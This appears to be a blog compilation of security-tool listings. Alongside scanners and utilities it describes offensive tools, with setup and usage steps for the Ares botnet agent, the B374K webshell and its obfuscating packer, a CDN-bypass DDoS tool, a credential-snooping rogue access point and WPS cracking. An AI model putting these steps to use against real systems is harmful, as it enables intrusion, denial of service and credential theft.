0d1n - Tool For Automating Customized Attacks Against Web Applications


Web security tool to make fuzzing at HTTP inputs, made in C with libCurl.

You can do:
  • brute force passwords in auth forms
  • directory disclosure ( use PATH list to brute, and find HTTP status code )
  • test list on input to find SQL Injection and XSS vulnerabilities



To run:

require libcurl-dev or libcurl-devel(on rpm linux based)
$ git clone https://github.com/CoolerVoid/0d1n/
need libcurl to run
$ sudo apt-get install libcurl-dev
if rpm distro
$ sudo yum install libcurl-devel
$ make
$./0d1n

Download 0d1n

3vilTwinAttacker - Create Rogue Wi-Fi Access Point and Snooping on the Traffic


This tool create an rogue Wi-Fi access point , purporting to provide wireless Internet services, but snooping on the traffic.

Software dependencies:
  • Recommended to use Kali linux.
  • Ettercap.
  • Sslstrip.
  • Airbase-ng include in aircrack-ng.
  • DHCP.
  • Nmap.

Install DHCP in Debian-based

Ubuntu
$ sudo apt-get install isc-dhcp-server

Kali linux
$ echo "deb http://ftp.de.debian.org/debian wheezy main " >> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server

Install DHCP in redhat-based

Fedora
$ sudo yum install dhcp

Tools Options:


Etter.dns: Edit etter.dns to loading module dns spoof.
Dns Spoof: Start dns spoof attack in interface ath0 fake AP.
Ettercap: Start ettercap attack in host connected AP fake Capturing login credentials.
Sslstrip: The sslstrip listen the traffic on port 10000.
Driftnet: The driftnet sniffs and decodes any JPEG TCP sessions, then displays in an window.


Deauth Attack: kill all devices connected in AP (wireless network) or the attacker can Also put the Mac-address in the Client field, Then only one client disconnects the access point.
Probe Request: Probe request capture the clients trying to connect to AP,Probe requests can be sent by anyone with a legitimate Media Access Control (MAC) address, as association to the network is not required at this stage.
Mac Changer: you can now easily spoof the MAC address. With a few clicks, users will be able to change their MAC addresses.
Device FingerPrint: list devices connected the network mini fingerprint, is information collected about a local computing device.

Video Demo



Download 3vilTwinAttacker

Acunetix clamps down on costly website security with online solution


2nd March 2015 - London, UK - As cyber security continues to hit the headlines, even smaller companies can expect to be subject to scrutiny and therefore securing their website is more important than ever. In response to this, Acunetix are offering the online edition of their vulnerability scanner at a new lower entry price. This new option allows consumers to opt for the ability to scan just one target or website and is a further step in making the top of the range scanner accessible to a wider market.

A web vulnerability scanner allows the user to identify any weaknesses in their website architecture which might aid a hacker. They are then given the full details of the problem in order to fix it. While the scanner might previously have been a niche product used by penetration testers, security experts and large corporations, in our current cyber security climate, such products need to be made available to a wider market. Acunetix have recognised this which is why both the product and its pricing have become more flexible and tailored to multiple types of user, with a one scan target option now available at $345. Pricing for other options has also been reduced by around 15% to reflect the current strength of the dollar. Use of the network scanning element of the product is also currently being offered completely free.

Acunetix CEO Nicholas Galea said: ‘Due to recent attacks such as the Sony hack and the Anthem Inc breach, companies are under increasing pressure to ensure their websites and networks are secure. We’ve been continuously developing our vulnerability scanner for a decade now, it’s a pioneer in the field and continues to be the tool of choice for many security experts. We feel it’s a tool which can benefit a far wider market which is why we developed the more flexible and affordable online version.’

About Acunetix Vulnerability Scanner (Online version)

User-friendly and competitively priced, Acunetix Vulnerability Scanner fully interprets and scans websites, including HTML5 and JavaScript and detects a large number of vulnerabilities, including SQL Injection and Cross Site Scripting, eliminating false positives. Acunetix beats competing products in many areas; including speed, the strongest support of modern technologies such as JavaScript, the lowest number of false positives and the ability to access restricted areas with ease. Acunetix also has the most advanced detection of WordPress vulnerabilities and a wide range of reports including HIPAA and PCI compliance.

Users can sign up for a trial of the online version of Acunetix which includes the option to run free network scans.  

Acunetix Online Vulnerability Scanner


Acunetix Online Vulnerability Scanner acts as a virtual security officer for your company, scanning your websites, including integrated web applications, web servers and any additional perimeter servers for vulnerabilities. And allowing you to fix them before hackers exploit the weak points in your IT infrastructure!

Leverages Acunetix leading web application scanner

Building on Acunetix’ advanced web scanning technology, Acunetix OVS scans your website for vulnerabilities – without requiring to you to license, install and operate Acunetix Web Vulnerability scanner. Acunetix OVS will deep scan your website – with its legendary crawling capability – including full HTML 5 support, and its unmatched SQL injection and Cross Site Scripting finding capabilities.

Unlike other online security scanners, Acunetix is able to find a much greater number of vulnerabilities because of its intelligent analysis engine – it can even detect DOM Cross-Site Scripting and Blind SQL Injection vulnerabilities. And with a minimum of false positives. Remember that in the world of web scanning its not the number of different vulnerabilities that it can find, its the depth with which it can check for vulnerabilities. Each scanner can find one or more SQL injection vulnerabilities, but few can find ALMOST ALL. Few scanners are able to find all pages and analyze all content, leaving large parts of your website unchecked. Acunetix will crawl the largest number of pages and analyze all content.

Utilizes OpenVAS for cutting edge network security scanning

And Acunetix OVS does not stop at web vulnerabilities. Recognizing the need to scan at network level and wanting to offer best of breed technology only, Acunetix has partnered with OpenVAS – the leading network security scanner. OpenVAS has been in development for more then 10 years and is backed by renowned security developers Greenbone. OpenVAS draws on a vulnerability database of thousands of network level vulnerabilities. Importantly, OpenVAS vulnerability databases are always up to date, boasting an average response rate of less than 24 hours for updating and deploying vulnerability signatures to scanners.

Start your scan today

Getting Acunetix on your side is easy – sign up in minutes, install the site verification code and your scan will commence. Scanning can take several hours, depending on the amount of pages and the complexity of the content. After completion, scan reports are emailed to you – and Acunetix Security Consultants are on standby to explain the results and help you action remediation. For a limited time period, 2 full Network Scans are included for FREE in the 14-day trial. 


Acunetix v10 - Web Application Security Testing Tool


Acunetix, the pioneer in automated web application security software, has announced the release of version 10 of its Vulnerability Scanner. New features are designed to prevent the risk of hacking for all customers; from small businesses up to large enterprises, including WordPress users, web application developers and pen testers.

With the number of cyber-attacks drastically up in the last year and the cost of breaches doubling, never has limiting this risk been such a high priority and a cost-effective investment. The 2015 Information Security Breaches Survey from PWC found 90% of large organisations had suffered a breach and average costs have escalated to over £3m per breach, at the higher end.

The areas of a website which are most likely to be attacked and are prone to vulnerabilities are those areas that require a user to login. Therefore the latest version of Acunetix vastly improves on its ‘Login Sequence Recorder’ which can now navigate multi-step authenticated areas automatically and with ease. It crawls at lightning speed with its ‘DeepScan’ crawling engine now analyzing web applications developed using both Java Frameworks and Ruby on Rails. Version 10 also improves the automated scanning of RESTful and SOAP-based web services and can now detect over 1200 vulnerabilities in WordPress core and plugins.

Automated scanning of restricted areas

Latest automation functionality makes Acunetix not only even easier to use, but gives better peace of mind through ensuring the entire website is scanned. Restricted areas, especially user login pages, make it more difficult for a scanner to access and often required manual intervention. The Acunetix “Login Sequence Recorder” overcomes this, having been significantly improved to allow restricted areas to be scanned completely automatically. This includes the ability to scan web applications that use Single Sign-On (SSO) and OAuth-based authentication. With the recorder following user actions rather than HTTP requests, it drastically improves support for anti-CSRF tokens, nonces or other one-time tokens, which are often used in restricted areas.

Top dog in WordPress vulnerability detection

With WordPress sites having exceeded 74 million in number, a single vulnerability found in the WordPress core, or even in a plugin, can be used to attack millions of individual sites. The flexibility of being able to use externally developed plugins leads to the development of even more vulnerabilities. Acunetix v10 now tests for over 1200 WordPress-specific vulnerabilities, based on the most frequently downloaded plugins, while still retaining the ability to detect vulnerabilities in custom built plugins. No other scanner on the market can detect as many WordPress vulnerabilities.

Support for various development architectures and web services

Many enterprise-grade, mission critical applications are built using Java Frameworks and Ruby on Rails. Version 10 has been engineered to accurately crawl and scan web applications built using these technologies. With the increase in HTML5 Single Page Applications and mobile applications, web services have become a significant attack vector. The new version improves support  for SOAP-based web services with WSDL and WCF descriptions as well as automated scanning of RESTful web services using WADL definitions. Furthermore, version 10, introduces dynamic crawl pre-seeding by integrating with external, third-party tools including Fiddler, Burp Suite and the Selenium IDE to enhance Business Logic Testing and the workflow between Manual Testing and Automation.

Detection of Malware and Phishing URLs

Acunetix WVS 10 will ship with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs. The Malware Detection Service makes use of the Google and Yandex Safe Browsing Database.

New in Acunetix Vulnerability Scanner v10
  • 'Login Sequence Recorder' has been re-engineered from the ground-up to allow restricted areas to be scanned entirely automatically.
  • Now tests for over 1200 WordPress-specific vulnerabilities in the WordPress core and plugins.
  • Acunetix WVS Crawl data can be augmented using the output of: Fiddler .saz files, Burp Suite saved items, Burp Suite state files, HTTP Archive (.har) files, Acunetix HTTP Sniffer logs, Selenium IDE Scripts.
  • Improved support for Java Frameworks (Java Server Faces [JSF], Spring and Struts) and Ruby on Rails.
  • Increased web services support for web applications which make use of WSDL based web-services, Microsoft WCF-based web services and RESTful web services.
  • Ships with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs.

Download Acunetix Web Vulnerability Scanner Version 10

Aircrack-ng 1.2 RC 2 - WEP and WPA-PSK keys cracking program


Here is the second release candidate. Along with a LOT of fixes, it improves the support for the Airodump-ng scan visualizer. Airmon-zc is mature and is now renamed to Airmon-ng. Also, Airtun-ng is now able to encrypt and decrypt WPA on top of WEP. Another big change is recent version of GPSd now work very well with Airodump-ng.

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.

 Aircrack-ng is the next generation of aircrack with lots of new features:

Download Aircrack-ng 1.2 RC 2

Aircrack-ng 1.2 RC 3 - WEP and WPA-PSK Keys Cracking Program


Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.

Third release candidate and hopefully this should be the last one. It contains a ton of bug fixes, code cleanup, improvements and compilation fixes everywhere. Some features were added: AppArmor profiles, better FreeBSD support, including an airmon-ng for FreeBSD.

Aircrack-ng Changelog

Version 1.2-rc3 (changes from aircrack-ng 1.2-rc2) - Released 21 Nov 2015:
  • Airodump-ng: Prevent sending signal to init which caused the system to reboot/shutdown.
  • Airbase-ng: Allow to use a user-specified ANonce instead of a randomized one when doing the 4-way handshake
  • Aircrack-ng: Fixed compilation warnings.
  • Aircrack-ng: Removed redundant NULL check and fixed typo in another one.
  • Aircrack-ng: Workaround for segfault when compiling aircrack-ng with clang and gcrypt and running a check.
  • Airmon-ng: Created version for FreeBSD.
  • Airmon-ng: Prevent passing invalid values as channel.
  • Airmon-ng: Handle udev renaming interfaces.
  • Airmon-ng: Better handling of rfkill.
  • Airmon-ng: Updated OUI URL.
  • Airmon-ng: Fix VM detection.
  • Airmon-ng: Make lsusb optional if there doesn't seem to be a usb bus. Improve pci detection slightly.
  • Airmon-ng: Various cleanup and fixes (including wording and typos).
  • Airmon-ng: Display iw errors.
  • Airmon-ng: Improved handling of non-monitor interfaces.
  • Airmon-ng: Fixed error when running 'check kill'.
  • Airdrop-ng: Display error instead of stack trace.
  • Airmon-ng: Fixed bashism.
  • Airdecap-ng: Allow specifying output file names.
  • Airtun-ng: Added missing parameter to help screen.
  • Besside-ng-crawler: Removed reference to darkircop.org (non-existent subdomain).
  • Airgraph-ng: Display error when no graph type is specified.
  • Airgraph-ng: Fixed make install.
  • Manpages: Fixed, updated and improved airodump-ng, airmon-ng, aircrack-ng, airbase-ng and aireplay-ng manpages.
  • Aircrack-ng GUI: Fixes issues with wordlists selection.
  • OSdep: Add missing RADIOTAP_SUPPORT_OVERRIDES check.
  • OSdep: Fix possible infinite loop.
  • OSdep: Use a default MTU of 1500 (Linux only).
  • OSdep: Fixed compilation on OSX.
  • AppArmor: Improved and added profiles.
  • General: Fixed warnings reported by clang.
  • General: Updated TravisCI configuration file
  • General: Fixed typos in various tools.
  • General: Fixed clang warning about 'gcry_thread_cbs()' being deprecated with gcrypt > 1.6.0.
  • General: Fixed compilation on cygwin due to undefined reference to GUID_DEVCLASS_NET
  • General: Fixed compilation with musl libc.
  • General: Improved testing and added test cases (make check).
  • General: Improved mutexes handling in various tools.
  • General: Fixed memory leaks, use afer free, null termination and return values in various tools and OSdep.
  • General: Fixed compilation on FreeBSD.
  • General: Various fixes and improvements to README (wording, compilation, etc).
  • General: Updated copyrights in help screen.


AntiCuckoo - A Tool to Detect and Crash Cuckoo Sandbox


A tool to detect and crash Cuckoo Sandbox. Tested in Cuckoo Sandbox Official and Accuvant's Cuckoo version.

Features
  • Detection:
    • Cuckoo hooks detection (all kind of cuckoo hooks).
    • Suspicius data in own memory (without APIs, page per page scanning).
  • Crash (Execute with arguments) (out of a sandbox these args dont crash the program):
    • -c1: Modify the RET N instruction of a hooked API with a higher value. Next call to API pushing more args into stack. If the hooked API is called from the Cuckoo's HookHandler the program crash because it only pushes the real API args then the modified RET N instruction corrupt the HookHandler's stack.
The overkill methods can be useful. For example using the overkill methods you have two features in one: detection/crash and "a kind of Sleep" (Cuckoomon bypass long Sleeps calls).

Cuckoo Detection

Submit Release/anticuckoo.exe to analysis in Cuckoo Sandbox. Check the screenshots (console output). Also you can check Accesed Files in Sumary:


Accesed Files in Sumary (django web):

Cuckoo Crash

Specify in submit options the crash argument, ex -c1 (via django web):

And check Screenshots/connect via RDP/whatson connection to verify the crash. Ex -c1 via RDP:



Download AntiCuckoo

AppCrashView - View Application Crashes (.wer files)


AppCrashView is a small utility for Windows Vista and Windows 7 that displays the details of all application crashes occurred in your system. The crashes information is extracted from the .wer files created by the Windows Error Reporting (WER) component of the operating system every time that a crash is occurred. AppCrashView also allows you to easily save the crashes list to text/csv/html/xml file.

System Requirements

For now, this utility only works on Windows Vista, Windows 7, and Windows Server 2008, simply because the earlier versions of Windows don't save the crash information into .wer files. It's possible that in future versions, I'll also add support for Windows XP/2000/2003 by using Dr. Watson (Drwtsn32.exe) or other debug component that capture the crash information.

Using AppCrashView

AppCrashView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - AppCrashView.exe The main window of AppCrashView contains 2 pane. The upper pane displays the list of all crashes found in your system, while the lower pane displays the content of the crash file that you select in the upper pane.

You can select one or more crashes in the upper pane, and then save them (Ctrl+S) into text/html/xml/csv file or copy them to the clipboard ,and paste them into Excel or other spreadsheet application.

Command-Line Options
/ProfilesFolder <Folder> Specifies the user profiles folder (e.g: c:\users) to load. If this parameter is not specified, the profiles folder of the current operating system is used.
/ReportsFolder <Folder> Specifies the folder that contains the WER files you wish to load.
/ShowReportQueue <0 | 1> Specifies whether to enable the 'Show ReportQueue Files' option. 1 = enable, 0 = disable
/ShowReportArchive <0 | 1> Specifies whether to enable the 'Show ReportArchive Files' option. 1 = enable, 0 = disable
/stext <Filename> Save the list of application crashes into a regular text file.
/stab <Filename> Save the list of application crashes into a tab-delimited text file.
/scomma <Filename> Save the list of application crashes into a comma-delimited text file (csv).
/stabular <Filename> Save the list of application crashes into a tabular text file.
/shtml <Filename> Save the list of application crashes into HTML file (Horizontal).
/sverhtml <Filename> Save the list of application crashes into HTML file (Vertical).
/sxml <Filename> Save the list of application crashes into XML file.
/sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Event Name" and "Process File". You can specify the '~' prefix character (e.g: "~Event Time") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
AppCrashView.exe /shtml "f:\temp\crashlist.html" /sort 2 /sort ~1
AppCrashView.exe /shtml "f:\temp\crashlist.html" /sort "Process File"
/nosort When you specify this command-line option, the list will be saved without any sorting.    


Download AppCrashView

Appie - Android Pentesting Portable Integrated Environment


Appie is a software package that has been pre-configured to function as an Android Pentesting Environment.It is completely portable and can be carried on USB stick.This is a one stop answer for all the tools needed in Android Application Security Assessment.

Difference between Appie and existing environments ?
  • Tools contained in Appie are running on host machine instead of running on virtual machine.
  • Less Space Needed(Only 600MB compared to atleast 8GB of Virual Machine)
  • As the name suggests it is completely Portable i.e it can be carried on USB Stick or on your own smartphone and your pentesting environment will go wherever you go without any differences.
  • Awesome Interface

Which tools are included in Appie ?

Download Appie

AppUse - Android Pentest Platform Unified Standalone Environment

AppUse Virtual Machine, developed by AppSec Labs, is a unique (and free) system, a platform for mobile application security testing in the android environment, and it includes unique custom-made tools.

Faster & More Powerful

The system is a blessing to security teams, who from now on can easily perform security tests on Android applications. It was created as a virtual machine targeted for penetration testing teams who are interested in a convenient, personalized platform for android application security testing, for catching security problems and analysis of the application traffic.

Now, in order to test Android applications, all you will need is to download AppUse Virtual Machine, activate it, load your application and test it.


Easy to Use

There is no need for installation of simulators and testing tools, no need for SSL certificates of the proxy software, everything comes straight out of the box pre-installed and configured for an ideal user experience.

Security experts who have seen the machine were very excited, calling it the next ‘BackTrack’ (a famous system for testing security problems), specifically adjusted for Android application security testing.

AppUse VM closes gaps in the world of security, now there is a special and customized testing environment for Android applications; an environment like this has not been available until today, certainly not with the rich format offered today by AppUse VM.

This machine is intended for the daily use of security testers everywhere for Android applications, and is a must-have tool for any security person.

We at AppSec Labs do not stagnate, specifically at a time in which so many cyber attacks take place, we consider it our duty to assist the public and enable quick and effective security testing.

As a part of AppSec Labs’ policy to promote application security in general, and specifically mobile application security, AppUse is offered as a free download on our website, in order to share the knowledge, experience and investment with the data security community.

Features
  • New Application Data Section
  •  Tree-view of the application’s folder/file structure
  •  Ability to pull files
  •  Ability to view files
  •  Ability to edit files
  •  Ability to extract databases
  •  Dynamic proxy managed via the Dashboard
  •  New application-reversing features
  •  Updated ReFrameworker tool
  •  Dynamic indicator for Android device status
  •  Bugs and functionality fixes

Download AppUse

ARDT - Akamai Reflective DDoS Tool


Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.

How it works...

Based off the research done at NCC: ( https://dl.packetstormsecurity.net/papers/attack/the_pentesters_guide_to_akamai.pdf )
Akamai boast around 100,000 edge nodes around the world which offer load balancing, web application firewall, caching etc, to ensure that a minimal amount of requests actually hit your origin web-server beign protected. However, the issue with caching is that you cannot cache something that is non-deterministic, I.E a search result. A search that has not been requested before is likely not in the cache, and will result in a Cache-Miss, and the Akamai edge node requesting the resource from the origin server itself.

What this tool does is, provided a list of Akamai edge nodes and a valid cache missing request, produces multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with 100,000 Akamai edge node list, and a request which resulting in 10KB hitting the origin, if my calculations are correct, thats around 976MB/ps hitting the origin server, which is a hell of a lot of traffic.

Finding Akamai Edge Nodes

To find Akamai Edge Nodes, the following script has been included:
# python ARDT_Akamai_EdgeNode_Finder.py
This can be edited quite easily to find more, it then saves the IPS automatically.


Download ARDT

Ares - Python Botnet and Backdoor



Ares is made of two main programs:
  • A Command aNd Control server, which is a Web interface to administer the agents
  • An agent program, which is run on the compromised host, and ensures communication with the CNC
The Web interface can be run on any server running Python. You need to install the cherrypy package.
The client is a Python program meant to be compiled as a win32 executable using pyinstaller. It depends on the requests, pythoncom, pyhook python modules and on PIL (Python Imaging Library).

It currently supports:
  • remote cmd.exe shell
  • persistence
  • file upload/download
  • screenshot
  • key logging

Installation

Server

To install the server, first create the sqlite database:
cd server/
python db_init.py
If no installed, install the cherrypy python package.
Then launch the server by issuing: python server.py
By default, the server listens on http://localhost:8080

Agent

The agent can be launched as a python script, but it is ultimately meant to be compiled as a win32 executable using pyinstaller.

First, install all the dependencies:
  • requests
  • pythoncom
  • pyhook
  • PIL
Then, configure agent/settings.py according to your needs:
SERVER_URL = URL of the CNC http server
BOT_ID = the (unique) name of the bot, leave empty to use hostname
DEBUG = should debug messages be printed to stdout ?
IDLE_TIME = time of inactivity before going in idle mode (the agent checks the CNC for commands far less often when idle).
REQUEST_INTERVAL = interval between each query to the CNC when active
Finally, use pyinstaller to compile the agent into a single exe file:
cd client/
pyinstaller --onefile --noconsole agent.py


Download Ares

AsHttp - Shell Command to Expose any other Command as HTTP


ashttp provide a simple way to expose any shell command by HTTP. For example, to expose top by HTTP, try : ashttp -p8080 top ; then try http://localhost:8080.

Dependencies

ashttp depends on hl_vt100, a headless VT100 emulator.
To get and compile hl_vt100 :
$ git clone https://github.com/JulienPalard/vt100-emulator.git
$ aptitude install python-dev
$ make python_module
$ python setup.py install

Usage

ashttp can serve any text application over HTTP, like :
$ ashttp -p 8080 top
to serve a top on port 8080
$ ashttp -p 8080 watch -n 1 ls -lah /tmp

to serve an actualized directory listing of /tmp


Download AsHttp

ATSCAN - Server, Site and Dork Scanner



Description:

  • ATSCAN Version 2 
  • Dork scanner. 
  • XSS scanner. 
  • Sqlmap. 
  • LFI scanner.
  • Filter wordpress and Joomla sites in the server. 
  • Find Admin page.
  • Decode / Encode MD5 + Base64. 

Libreries to install:

ap-get install libxml-simple-perl
NOTE: Works in linux platforms.

Permissions & Executution:

$chmod +x atscan.pl 
perl ./atscan.pl

Screenshots: 






Download ATSCAN

AutoBrowser - Create Report and Screenshots of HTTP/s Based Ports on the Network

AutoBrowser is a tool written in python for penetration testers. The purpose of this tool is to create report and screenshots of http/s based ports on the network. It analyze Nmap Report or scan with Nmap, Check the results with http/s request on each host using headless web browser, Grab a screenshot of the response page content.
  • This tool is designed for IT professionals to perform penetration testing to scan and analyze NMAP results.

Proof of concept video (From version: 2.0)

Examples

Delimiting the values on the CLI arguments it must be by double quotes only!
  • Get the argument details of scan method: python AutoBrowser.py scan --help
  • Scan with Nmap and Checks the results and create folder by name project_name: python AutoBrowser.py scan "192.168.1.1/24" -a="-sT -sV -T3" -p project_name
  • Get the argument details of analyze method: python AutoBrowser.py analyze --help
  • Analyzing Nmap XML report and create folder by name report_analyze: python AutoBrowser.py analyze nmap_file.xml --project report_analyze

Requirements:

Linux Installation:
  1. sudo apt-get install python-pip python2.7-dev libxext-dev python-qt4 qt4-dev-tools build-essential nmap
  2. sudo pip install -r requirements.txt

MacOSx Installation:
  1. Install Xcode Command Line Tools (AppStore)
  2. ruby -e "$(curl -fsSL https://raw.github.com/mxcl/homebrew/go)"
  3. brew install pyqt nmap
  4. sudo easy_install pip
  5. sudo pip install -r requirements.txt

Windows Installation:
  1. Install setuptools
  2. Install pip
  3. Install PyQt4
  4. install Nmap
  5. Open Command Prompt(cmd) as Administrator -> Goto python folder -> Scripts (cd c:\Python27\Scripts)
  6. pip install -r (Full Path To requirements.txt)


Download AutoBrowser

AutoReaver - Mutliple Access Point Targets Attack Using Reaver

AutoReaver is bash script which provides multiple access point attack using reaver and BSSIDs list from a text file.

If processed AP reaches rate limit, script goes to another from the list, and so forth.

HOW IT WORKS ?
Script takes AP targets list from text file in following format
BSSID CHANNEL ESSID
For example:
AA:BB:CC:DD:EE:FF 1 MyWlan 
00:BB:CC:DD:EE:FF 13 TpLink 
00:22:33:DD:EE:FF 13 MyHomeSSID
And then following steps are being processed:
  • Every line of list file is checked separately in for loop
  • After every AP on the list once, script automatically changes MAC address of your card to random MAC using macchanger (you can also setup your own MAC if you need),
  • Whole list is checked again and again, in endless while loop, until there is nothing to check loop is stopped,
  • Found PINS/WPA PASSPHRASES are stored in {CRACKED_LIST_FILE_PATH} file.

REQUIREMENTS
  • Wireless adapter which supports injection (see [https://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers Reaver Wiki])
  • Linux Backtrack 5
  • Root access on your system (otherwise some things may not work)
  • AND if you use other Linux distribution*
    • Reaver 1.4 (I didn't try it with previous versions)
    • KDE (unless you'll change 'konsole' invocations to 'screen', 'gnome-terminal' or something like that... this is easy)
    • Gawk (Gnu AWK)
    • Macchanger
    • Airmon-ng, Airodump-ng, Aireplay-ng
    • Wash (WPS Service Scanner)
    • Perl

USAGE EXAMPLE
First you have to download lastest version
git clone https://code.google.com/p/auto-reaver/
Go to auto-reaver directory
cd ./auto-reaver
Make sure that scripts have x permissions for your user, if not run
chmod 700 ./washAutoReaver
chmod 700 ./autoReaver
Run wash scanner to make a formatted list of Access Points with WPS service enabled
./washAutoReaverList > myAPTargets
Wait for 1-2 minutes for wash to collect APs, and hit CTRL+C to kill the script. Check if any APs were detected
cat ./myAPTargets
If there are targets in myAPTargets file, you can proceed attack, with following command:
./autoReaver myAPTargets

ADDITIONAL FEATURES
  • Script logs dates of PIN attempts, so you can check how often AP is locked and for how long. Default directory for those logs is ReaverLastPinDates.
  • Script logs each AP rate limit for every AP (default directory is /tmp/APLimitBSSID), so you can easily check when last rate limit occured
  • You can setup your attack using variables from configurationSettings file (sleep/wait times between AP`s and loops, etc.)
  • You can disable checking AP by adding "#" sign in the beginning of line, in myAPTargets file (then AP will be ommited in loop)
  • (added 2014-07-03) You can setup specific settings per access point.
    To do that for AP with MAC AA:BB:CC:DD:EE:FF, just create file ./configurationSettingsPerAp/AABBCCDDEEFF
    and put there variables from ./configurationSettings file that you want to change for example:
    ADDITIONAL_OPTIONS="-g 10 -E -S -N -T 1 -t 15 -d 0 -x 3";
so AA:BB:CC:DD:EE:FF will have only ADDITIONAL_OPTIONS changed (rest of variables from ./configurationSettings file remains unchanged).
You can define channel as random by setting it's value (in myAPTargets file) to R, you can force script to automatically find AP channel.
Example:
AA:BB:CC:DD:EE:FF R MyWlan

But remember that you probably should also increase value of BSSID_ONLINE_TIMEOUT variable - since hopping between all channels takes much more time than searching on one channel.


Download AutoReaver

Autorize - Automatic Authorization Enforcement Detection (Extension for Burp Suite)


Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert at AppSec Labs. Autorize was designed to help security testers by performing automatic authorization tests.

Installation
  1. Download Burp Suite (obviously): http://portswigger.net/burp/download.html
  2. Download Jython standalone JAR: http://www.jython.org/downloads.html
  3. Open burp -> Extender -> Options -> Python Environment -> Select File -> Choose the Jython standalone JAR
  4. Install Autorize from the BApp Store or follow these steps:
  5. Download the Autorize.py file.
  6. Open Burp -> Extender -> Extensions -> Add -> Choose Autorize.py file.
  7. See the Autorize tab and enjoy automatic authorization detection :)

User Guide - How to use?
  1. After installation, the Autorize tab will be added to Burp.
  2. Open the configuration tab (Autorize -> Configuration).
  3. Get your low-privileged user authorization token header (Cookie / Authorization) and copy it into the textbox containing the text "Insert injected header here".
  4. Click on "Intercept is off" to start intercepting the traffic in order to allow Autorize to check for authorization enforcement.
  5. Open a browser and configure the proxy settings so the traffic will be passed to Burp.
  6. Browse to the application you want to test with a high privileged user.
  7. The Autorize table will show you the request's URL and enforcement status.
  8. It is possible to click on a specific URL and see the original/modified request/response in order to investigate the differences.

Authorization Enforcement Status

There are 3 enforcement statuses:
  1. Authorization bypass! - Red color
  2. Authorization enforced! - Green color
  3. Authorization enforced??? (please configure enforcement detector) - Yellow color
The first 2 statuses are clear, so I won’t elaborate on them.
The 3rd status means that Autorize cannot determine if authorization is enforced or not, and so Autorize will ask you to configure a filter in the enforcement detector tab.
The enforcement detector filters will allow Autorize to detect authorization enforcement by fingerprint (string in the message body) or content-length in the server's response.

For example, if there is a request enforcement status that is detected as "Authorization enforced??? (please configure enforcement detector)" it is possible to investigate the modified/original response and see that the modified response body includes the string "You are not authorized to perform action", so you can add a filter with the fingerprint value "You are not authorized to perform action", so Autorize will look for this fingerprint and will automatically detect that authorization is enforced. It is possible to do the same by defining content-length filter.


AVCaesar - Malware Analysis Engine and Repository


AVCaesar is a malware analysis engine and repository, developed by malware.lu within the FP7 project CockpitCI.

Functionalities

AVCaesar can be used to:
  • Perform an efficient malware analysis of suspicious files based on the results of a set of antivirus solutions, bundled together to reach the highest possible probability to detect potential malware;
  • Search for malware samples in a progressively increasing malware repository.
The basic functionalities can be extended by:
  • Download malware samples (15 samples/day for registered users and 100 samples/day for premium users);
  • Perform confidential malware analysis (reserved to premium users)

Malware analysis process

The malware analysis process is kept as easy and intuitive as possible for AVCaesar users:
  • Submit suspicious file via AVCaesar web interface. Premium users can choose to perform a confidential analysis.
  • Receive a well-structured malware analysis report.



B374K - PHP Webshell with handy features


This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser.

Features :
  • File manager (view, edit, rename, delete, upload, download, archiver, etc)
  • Search file, file content, folder (also using regex)
  • Command execution
  • Script execution (php, perl, python, ruby, java, node.js, c)
  • Give you shell via bind/reverse shell connect
  • Simple packet crafter
  • Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
  • SQL Explorer
  • Process list/Task manager
  • Send mail with attachment (you can attach local file on server)
  • String conversion
  • All of that only in 1 file, no installation needed
  • Support PHP > 4.3.3 and PHP 5

Requirements :
  • PHP version > 4.3.3 and PHP 5
  • As it using zepto.js v1.1.2, you need modern browser to use b374k shell. See browser support on zepto.js website http://zeptojs.com/
  • Responsibility of what you do with this shell

Installation :
Download b374k.php (default password : b374k), edit and change password and upload b374k.php to your server, password is in sha1(md5()) format. Or create your own b374k.php, explained below

Customize :
After finished doing editing with files, upload index.php, base, module, theme and all files inside it to a server
Using Web Browser :
Open index.php in your browser, quick run will only run the shell. Use packer to pack all files into single PHP file. Set all the options available and the output file will be in the same directory as index.php
Using Console :
$ php -f index.php
b374k shell packer 0.4

options :
        -o filename                             save as filename
        -p password                             protect with password
        -t theme                                theme to use
        -m modules                              modules to pack separated by comma
        -s                                      strip comments and whitespaces
        -b                                      encode with base64
        -z [no|gzdeflate|gzencode|gzcompress]   compression (use only with -b)
        -c [0-9]                                level of compression
        -l                                      list available modules
        -k                                      list available themes
example :
$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9
Don't forget to delete index.php, base, module, theme and all files inside it after you finished. Because it is not protected with password so it can be a security threat to your server


Download B374K

Babun - A Windows shell you will love!


Would you like to use a linux-like console on a Windows host without a lot of fuzz? Try out babun!

Installation

Just download the dist file from http://babun.github.io, unzip it and run the install.bat script. After a few minutes babun starts automatically. The application will be installed to the %USER_HOME%\.babun directory. Use the /target option to install babun to a custom directory.

Features in 10 seconds

Babun features the following:
  • Pre-configured Cygwin with a lot of addons
  • Silent command-line installer, no admin rights required
